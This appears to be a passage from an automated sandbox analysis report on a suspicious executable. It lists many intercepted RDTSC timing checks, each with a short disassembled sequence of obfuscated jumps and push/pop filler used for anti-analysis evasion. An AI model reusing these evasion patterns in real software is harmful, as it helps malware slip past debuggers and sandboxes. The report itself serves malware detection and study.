Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2C4BD second address: F2C4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 jmp 00007F4BA0D39717h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4BA0D39706h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50EC5 second address: E50EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702BC second address: 53702D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702D1 second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702F5 second address: 5370338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4BA0D3F167h 0x00000009 sbb cl, 0000000Eh 0x0000000c jmp 00007F4BA0D3F169h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bx, si 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370338 second address: 5370374 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 66419DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f add ch, FFFFFFB8h 0x00000012 jmp 00007F4BA0D3970Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906A1 second address: 53906B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906B0 second address: 53906DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov di, 59FCh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906DC second address: 5390706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4BA0D3F15Dh 0x0000000a and si, A556h 0x0000000f jmp 00007F4BA0D3F161h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390706 second address: 539076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F4BA0D39712h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4BA0D39710h 0x00000019 push eax 0x0000001a jmp 00007F4BA0D3970Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4BA0D39715h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 539076D second address: 53907CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4BA0D3F15Ch 0x00000013 add si, D5C8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c sub cx, D828h 0x00000031 jmp 00007F4BA0D3F15Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53907CC second address: 5390814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f sbb cx, A5B8h 0x00000014 jmp 00007F4BA0D3970Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390814 second address: 5390826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390826 second address: 5390849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4BA0D3970Bh 0x00000012 pop eax 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390849 second address: 539085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908BC second address: 53908C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908C0 second address: 53908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908D9 second address: 53908DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908DF second address: 53908E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 539097D second address: 5390987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 44FADD78h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390987 second address: 538002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov ax, 42FDh 0x0000000f pushfd 0x00000010 jmp 00007F4BA0D3F15Ah 0x00000015 or ch, FFFFFFD8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e popad 0x0000001f retn 0004h 0x00000022 nop 0x00000023 cmp eax, 00000000h 0x00000026 setne al 0x00000029 jmp 00007F4BA0D3F152h 0x0000002b xor ebx, ebx 0x0000002d test al, 01h 0x0000002f jne 00007F4BA0D3F157h 0x00000031 sub esp, 04h 0x00000034 mov dword ptr [esp], 0000000Dh 0x0000003b call 00007F4BA543C74Bh 0x00000040 mov edi, edi 0x00000042 jmp 00007F4BA0D3F15Dh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b call 00007F4BA0D3F163h 0x00000050 pop ecx 0x00000051 movsx edi, ax 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538002B second address: 538007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, DA3Ah 0x00000011 mov edi, 5DC06006h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4BA0D39719h 0x00000020 and cl, 00000066h 0x00000023 jmp 00007F4BA0D39711h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edi 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov ebx, esi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538007B second address: 53800BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 sbb eax, 60E36C38h 0x0000000e jmp 00007F4BA0D3F15Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F160h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800BF second address: 53800C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800C5 second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800CB second address: 5380125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 jmp 00007F4BA0D39710h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F4BA0D39717h 0x00000025 pop esi 0x00000026 mov dh, D0h 0x00000028 popad 0x00000029 mov ax, 2C21h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380125 second address: 5380129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380129 second address: 538013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538013C second address: 5380154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380154 second address: 5380158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801AE second address: 53801CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801CB second address: 53801D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801D1 second address: 53801D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801D5 second address: 5380205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 4A08ED47h 0x00000015 jmp 00007F4BA0D3970Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380205 second address: 5380252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 popad 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F167h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380252 second address: 5380258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380258 second address: 538025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538025C second address: 5380276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4BA0D398AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3970Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380276 second address: 53802A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 mov dword ptr [ebp-14h], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53802A7 second address: 53802AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53802AB second address: 53802C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538039B second address: 53803A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53803A1 second address: 53803B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53803B4 second address: 5380484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4BA0D3973Bh 0x00000011 jmp 00007F4BA0D3970Eh 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 pushad 0x0000001a mov ax, 19FDh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 jne 00007F4C11A577AEh 0x00000028 jmp 00007F4BA0D39715h 0x0000002d mov ebx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 movzx esi, bx 0x00000034 pushfd 0x00000035 jmp 00007F4BA0D39719h 0x0000003a adc cx, 7D26h 0x0000003f jmp 00007F4BA0D39711h 0x00000044 popfd 0x00000045 popad 0x00000046 lea eax, dword ptr [ebp-2Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F4BA0D39713h 0x00000052 or cl, 0000005Eh 0x00000055 jmp 00007F4BA0D39719h 0x0000005a popfd 0x0000005b mov eax, 622CF927h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380484 second address: 538048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538048A second address: 538048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538048E second address: 53804C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804C0 second address: 53804CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804CF second address: 53804E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804E1 second address: 53804E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E23 second address: 5370E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E27 second address: 5370E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E2D second address: 5370E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E33 second address: 5370E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4BA0D3970Fh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D39710h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E60 second address: 5370E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E66 second address: 5370E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E6C second address: 5370E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E70 second address: 5370E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4BA0D39714h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edx 0x00000015 mov bh, 8Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E97 second address: 5370E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E9D second address: 5370ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4BA0D39711h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3970Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370ED2 second address: 5370ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A5F second address: 5380A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 249AA07Bh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, cx 0x00000013 pop eax 0x00000014 call 00007F4BA0D39711h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A86 second address: 5380A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov ax, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A97 second address: 5380AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AA8 second address: 5380AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AAC second address: 5380AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AB8 second address: 5380ADF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4EC02E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 08BB9F15h 0x00000014 jmp 00007F4BA0D3F162h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C0A second address: 5380C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3970Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C2C second address: 5380C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C11A42E9Ah 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 cmp dword ptr [ebp+08h], 00002000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D3F161h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C67 second address: 5380C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C6D second address: 5380C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909C4 second address: 53909CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909CA second address: 53909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909CF second address: 53909D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909D5 second address: 53909D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909D9 second address: 53909DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909DD second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e popad 0x0000000f rdtsc
